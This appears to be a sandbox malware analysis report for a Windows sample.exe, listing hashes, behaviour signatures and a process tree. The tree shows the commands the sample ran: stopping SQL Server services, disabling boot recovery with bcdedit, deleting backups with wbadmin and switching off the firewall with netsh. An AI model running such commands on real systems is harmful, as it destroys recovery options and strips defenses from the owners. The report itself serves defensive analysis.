Overview

overview

10

Static

static

sample.exe

windows7_x64

10

sample.exe

windows10_x64

8

Analysis

  • max time kernel
    49s
  • max time network
    129s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-05-2021 17:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sample.exe

  • Size

    1.3MB

  • MD5

    0e64acab6fb3d50aaebc17e6dfb2d289

  • SHA1

    c5c672a4a8ebae04cf7471c56136dce58ccd88f0

  • SHA256

    cd19340138f9eab48d20b3bf0a9dc6b4a6908d14cd48511ccefd6dba9e84705f

  • SHA512

    e797d31d7355d1f222a444fa934599582ffd9593185668382b9ad05ade1086d152f342305fb1b734a4cc0f691b2b4ba70fd8f183f77aa3f6f775a470fb4e7013

Score
8/10
evasion

Malware Config

Signatures

  • Modifies Windows Firewall 1 TTPs
    evasion
  • Drops desktop.ini file(s) 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • NTFS ADS 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3656
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSDTC
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Windows\SysWOW64\net.exe
        net stop MSDTC
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSDTC
          4⤵
            PID:2388
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        2⤵
          PID:4052
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
          2⤵
            PID:4012
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
            2⤵
              PID:3124
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3028
              • C:\Windows\SysWOW64\net.exe
                net stop SQLSERVERAGENT
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4076
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SQLSERVERAGENT
                  4⤵
                    PID:3348
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3152
                • C:\Windows\SysWOW64\net.exe
                  net stop MSSQLSERVER
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2108
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop MSSQLSERVER
                    4⤵
                      PID:3728
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c net stop vds
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2208
                  • C:\Windows\SysWOW64\net.exe
                    net stop vds
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1468
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop vds
                      4⤵
                        PID:800
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2364
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set currentprofile state off
                      3⤵
                        PID:2388
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c netsh firewall set opmode mode=disable
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1908
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                          PID:3480
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c net stop SQLWriter
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2676
                        • C:\Windows\SysWOW64\net.exe
                          net stop SQLWriter
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1224
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop SQLWriter
                            4⤵
                              PID:3812
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c net stop SQLBrowser
                          2⤵
                            PID:3308
                            • C:\Windows\SysWOW64\net.exe
                              net stop SQLBrowser
                              3⤵
                                PID:3736
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop SQLBrowser
                                  4⤵
                                    PID:4000
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                                2⤵
                                  PID:1308
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop MSSQLSERVER
                                    3⤵
                                      PID:2300
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop MSSQLSERVER
                                        4⤵
                                          PID:856
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c net stop MSSQL$CONTOSO1
                                      2⤵
                                        PID:1104
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop MSSQL$CONTOSO1
                                          3⤵
                                            PID:2668
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop MSSQL$CONTOSO1
                                              4⤵
                                                PID:2348

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v6

                                        Initial Access

                                        Execution

                                        Persistence

                                        Modify Existing Service

                                        1
                                        T1031

                                        Privilege Escalation

                                        Defense Evasion

                                        Credential Access

                                        Discovery

                                        Lateral Movement

                                        Collection

                                        Exfiltration

                                        Command and Control

                                        Impact

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • memory/800-128-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/856-141-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/1104-142-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/1224-134-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/1308-139-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/1468-127-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/1748-114-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/1908-131-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2108-124-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2204-115-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2208-126-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2300-140-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2348-144-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2364-129-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2388-130-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2388-116-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2668-143-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/2676-133-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3028-120-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3124-119-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3152-123-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3308-136-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3348-122-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3480-132-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3728-125-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3736-137-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/3812-135-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/4000-138-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/4012-118-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/4052-117-0x0000000000000000-mapping.dmp
                                          Download
                                        • memory/4076-121-0x0000000000000000-mapping.dmp
                                          Download